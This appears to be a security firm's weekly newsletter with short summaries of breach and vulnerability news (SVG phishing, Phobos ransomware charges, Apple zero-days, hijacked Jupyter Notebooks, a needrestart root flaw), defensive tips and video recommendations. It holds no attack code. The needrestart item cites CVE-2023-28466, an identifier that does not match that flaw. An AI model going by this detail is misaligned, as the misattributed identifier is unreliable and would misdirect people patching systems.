Hello there 👋
Welcome back to the Kraven Security weekly newsletter, triaging the week. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
Top 5 News Stories
SVG Attachments: The New Frontier in Phishing Attacks
Cybercriminals are now using SVG files in phishing emails to bypass traditional security measures, making these attacks harder to detect. Be cautious when receiving emails with unusual file attachments!
Key takeaways:
📈 Rising Trend: SVG attachments are becoming a common vector for phishing, allowing malware and phishing forms to evade detection.
🖼️ SVG Exploitation: SVG files, known for graphics, can execute JavaScript, making them perfect for embedding malicious scripts or phishing content.
🚫 Security Overlook: These files often go undetected by security software due to their textual nature, resembling harmless images.
⚠️ User Caution: Unless expecting SVG files, users should treat emails with such attachments highly suspiciously.
🔍 Security Advice: Regularly update security protocols and educate users about new phishing techniques involving SVG files.
Extradition Leads to Charges Against Phobos Ransomware Admin
The U.S. has charged Evgenii Ptitsyn, a Russian national, for orchestrating Phobos ransomware attacks after his extradition from South Korea. His operations resulted in over $16 million in ransom payments from more than 1,000 victims.
Key takeaways:
🇺🇸 Extradition: Evgenii Ptitsyn, a Russian, was extradited from South Korea to face U.S. charges for his role in Phobos ransomware operations.
💸 Financial Impact: The Phobos ransomware group extorted over $16 million from victims, primarily targeting U.S. entities.
🏥 Victim Profile: The ransomware attacks hit various sectors, including schools and hospitals, affecting over 1,000 victims.
🔒 Charges: Ptitsyn, also known as “derxan” and “zimmermanx,” faces charges related to conspiracy to commit wire fraud, damage to protected computers, and other cybercrimes.
🌐 International Cooperation: This case highlights the global effort to combat cybercrime through extradition and international legal cooperation.
U.S. Department of Justice (DoJ)
Apple Patches Critical Zero-Day Vulnerabilities in macOS
Apple has released urgent security updates for macOS Sequoia 15.1.1, iOS 18.1.1, and iPadOS 18.1.1 to fix two zero-day flaws that were exploited in attacks targeting Intel-based Macs.
Key takeaways:
🛡️ Apple addressed two zero-day vulnerabilities in their latest macOS, iOS, and iPadOS updates.
💻 The vulnerabilities, CVE-2024-44308 and CVE-2024-44309, affected Intel-based Macs, allowing attackers to execute arbitrary code with kernel privileges and perform cross-site scripting attacks.
⚠️ These flaws were actively exploited in the wild, making the updates critical for all users to install.
🔄 CVE-2024-44308 was discovered by an anonymous researcher, while CVE-2024-44309 was found by Clément Lecigne of Google’s Threat Analysis Group.
🆘 Users are urged to update their systems immediately to prevent potential security breaches.
Jupyter Notebooks Exploited for Illegal Sports Streaming
Hackers have found a new way to misuse technology – by hijacking unsecured Jupyter Notebooks to illegally stream sports events! This demonstrates the critical need for securing development environments.
Key takeaways:
🔒 Hackers exploit unauthenticated Jupyter Notebooks for initial access to systems.
📡 They use these notebooks to download and execute FFmpeg, a powerful multimedia framework, enabling them to capture and illegally stream sports events from sources like beIN Sports.
🎥 The attackers set up the streams to be broadcasted on platforms like ustream.tv, showcasing a misuse of cloud environments for piracy.
🔍 This incident underscores the importance of securing data science tools against unauthorized access and misuse.
🚨 Security recommendations include robust authentication, regular updates, and monitoring of Jupyter Notebooks to prevent such vulnerabilities.
Ubuntu Linux Users at Risk from Old ‘Needrestart’ Vulnerability
A decade-old vulnerability in the ‘needrestart’ utility could allow attackers to escalate privileges to root. Ensure your systems are patched to prevent potential security breaches.
Key takeaways:
🚨 Critical Vulnerability: A flaw in the ‘needrestart’ utility, present for over ten years, allows attackers to gain root access by exploiting a race condition.
🕵️♂️ Privilege Escalation: This issue, known as CVE-2023-28466, can be leveraged to escalate privileges from an unprivileged user to root, compromising system security.
🔧 Affected Systems: All Ubuntu Linux systems using the ‘needrestart’ tool for managing service restarts post-updates are vulnerable.
🔄 Patch Available: Ubuntu has released patches for this vulnerability. Immediate updates are recommended to safeguard your systems.
🔒 Security Measures: Users should update their systems and consider additional security measures like regular audits and monitoring of system activities for suspicious behavior.
Qualys Threat Research Unit (TRU)
Top Tips of the Week
Threat Intelligence
- Foster a culture of continuous improvement in threat intelligence. Regularly assess and enhance processes for optimal effectiveness.
- Stay informed on threat intelligence trends. Knowledge of emerging techniques empowers more effective threat detection.
- Implement threat intelligence sharing agreements with trusted partners. External collaboration strengthens overall CTI capabilities.
Threat Hunting
- Learn from historical incidents. Analyzing past events provides insights for improving threat intelligence and incident response.
- Monitor insider threats. Combine behavioral analytics with threat intelligence for a comprehensive approach.
- Monitor third-party risks in cyber threat hunting. Assess and manage cybersecurity risks associated with vendors and partners.
Custom Tooling
- Create custom tools with data integrity in mind. Implement measures to prevent data corruption and ensure accurate results.
Feature Video
Do you know what defensive capabilities your organization has? Do you know what team is doing what to combat threats? Do you have a way of coordinating your defensive efforts? Let me introduce you to the Courses of Action (CoA) matrix.
This key strategic planning tool will allow you to assess your defensive capabilities, provide security teams with situational awareness, and enable you to coordinate defensive efforts. It provides a structured framework to help you organize your tactical and procedural responses to cyber threats.
Learn about it in this video to assess how resilient your organization is against a cyber attack, help answer intelligence requirements, and drive critical thinking about defensive capabilities.
Let’s get started!
Learning Resources
OpenBAS: An Open-Source Breach and Attack Platform
OpenBAS is another awesome open-source project from the creators of OpenCTI. This community call video on OpenBAS covers its key features and functionalities for testing security controls.
It covers how OpenBAS works in synergy with other tools like OpenCTI, allowing users to simulate attack scenarios and assess their security posture in real time through a practical walkthrough.
This is a fantastic platform that I highly recommend CTI analysts, threat hunters, and detection engineers check out!
Are Tiling Window Managers Worth It?
I recommend everyone in security (and technology) learn to use Linux. Part of that journey can include deciding if you should go full L33T nerd and start using a tiling windows manager.
Should you use one or do you want to know more about them? Check out this video!
It explores the appeal and functionality of tiling windows managers, how you can get started, and weighs up the pros and cons of using one.
Cloudflare Does Cloud Compute… Apparently
AWS, Azure, or GCP Getting Too Expensive? Well, Cloudflare’s cloud compute might be the way to go. They offer surprisingly robust serverless hosting without upfront costs.
This great video explores how you can use Cloudflare’s hosting services to build scalable projects, with generous free tiers and integrated features, making Cloudflare an appealing choice for indie developers and startups alike.
Discover the pros and cons (potential vendor lock-in and limited language support) of using Cloudflare for cloud services.
NSA TAO Chief on Disrupting Nation State Hackers
This is one of my favorite presentations from the GOAT of cyber security memes, Rob Joyce.
Hear the former Chief of the NSA’s Tailored Access Operations (TAO) discuss how the agency exploits network vulnerabilities for foreign intelligence. Plus, how you can defend yourself by better knowing your network, proactively defending yourself, and applying best security practices to stay ahead of sophisticated threats.
A fantastic presentation you should watch to fully appreciate the axiom “to defend effectively, organizations must know their networks better than the attackers.”
